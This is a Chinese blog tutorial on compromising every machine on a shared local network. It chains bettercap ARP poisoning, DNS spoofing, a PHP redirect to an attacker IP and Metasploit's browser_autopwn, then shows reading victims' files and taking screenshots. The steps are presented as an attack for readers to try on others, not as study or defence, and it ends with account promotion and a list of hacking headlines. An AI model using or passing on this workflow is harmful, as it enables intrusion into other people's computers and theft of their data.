手把手教你如何黑掉整个内网
现在我们就等鱼上钩,现在同一网关下的主机不管打开什么URL都会解析到我们的URL中,当他打开我们的URL时,程序会自动验证哪个pay可用
日出东方,唯我不败;千秋万代,一统江湖!
教主文成武德、泽被苍生 ,千秋万载,一统江湖!
测试主机:kali 2016.2
工具:bettercap、metasploit、dnsspoof、armitage
前期准备工作
在kali下并没有集成bettercap,所以我们需要自己安装
安装完成
启动postgresql服务
metasploit数据库初始化
查看数据库链接状态,如果这里显示数据库未连接可以参考:传送门 连接数据库
启动armitage(关于armitage)
准备一个hosts文件(用于DNS欺骗)
更改:刚才试了一下,在hosts文件中加上端口号好像会出现一些意料不到的问题。这里我们换个思路,直接到ip地址不加端口号,然后开启apache服务,然后将下面的代码保存为index.php放在根目录下(/var/www/html/)
<?php header("Location:http://10.167.33.1:8080"); ?>
这样在DNS欺骗后会跳到指定ip,然后在通过php重定向到我们的payload。
还有一种方法是在下边启动浏览器自动攻击插件时,将端口号直接改成80端口。
/**************************************zhun bei wan cheng *****************************************/
启动浏览器自动攻击模块:browser_autopwn
等待他将所有payload加载完成
arp攻击(执行:bettercap -X)
DNS欺骗(忘了截图 图是后补的 所以参数有点不一样)
现在我们就等鱼上钩,现在同一网关下的主机不管打开什么URL都会解析到我们的URL中,当他打开我们的URL时,程序会自动验证哪个pay可用
查看文件
屏幕截图
当然功能远远不止这些,更多好玩的可以自己探索。
水平有限,有错误请指出。
如果有一块学习的同志私聊我上车。
上车的有点多,要超载了,关注公众号吧,公众号更新会比知乎的更全面
公众号:sssie95zz
相关文章:
- 记者实测:短信验证码+身份证,就能挪走你手机里所有的钱
- 印度国防部网站首页昨天突然出现汉字“禅”(图)
- 黑客破解京东微联APP,窗帘自动打开上演夜半惊魂
- 劲爆:OfO小黄车最新款锁被破解,影响千万共享单车
- 《权利的游戏》第七季泄露始末 黑客是如何侵入HBO的?
- 发现 WannaCry 致命开关的英国黑客居然被FBI抓了!
- WannaCry勒索病毒再研究:黑客或说中文 英语一般
- 年涨幅260%的比特币 为何成为黑客的 “最佳选择”?
- 【现实版越狱】美国监狱5犯人合伙自造电脑成功入侵监狱网络
- 黑客可以利用你电脑的LED灯传输数据盗取资料
- 黑客世界的隐秘江湖:1个漏洞叫价300万
- 大部分感染勒索软件的公司都支付了赎金
- 浙大学生在顶级黑客大赛上夺冠 十秒钟攻破谷歌智能手机
- 苹果又傻眼了:中国黑客团队成功破解有锁iPhone7
- 黑客故事:我如何逼小偷把 iPhone 还回来的
发表回复